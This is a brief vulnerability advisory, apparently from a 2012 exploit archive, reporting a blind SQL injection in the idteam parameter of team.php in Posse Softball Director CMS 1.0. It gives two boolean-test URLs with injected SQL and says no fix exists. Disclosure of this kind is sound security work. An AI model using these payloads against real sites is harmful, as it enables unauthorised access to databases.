Posse Softball Director CMS (team.php) Blind SQL Injection Vulnerability

2012-01-04 09:15:18

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
~ Posse Softball Director CMS Blind SQL Injection Vulnerability team.php ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
[+] Autor: easy laster
[+] Vulnerabilities [Blind SQL Injection ]
[+] Page: www.possesports.com
[+] Language: [ PHP ]
[+] Version: 1.0
[+] Date: 04.01.2012
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability

team.php?idteam=

[+] Exploitable

http://[host]/[path]/team.php?idteam=1+and+1=1--+ #true
http://[host]/[path]/team.php?idteam=1+and+1=2--+ #false

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.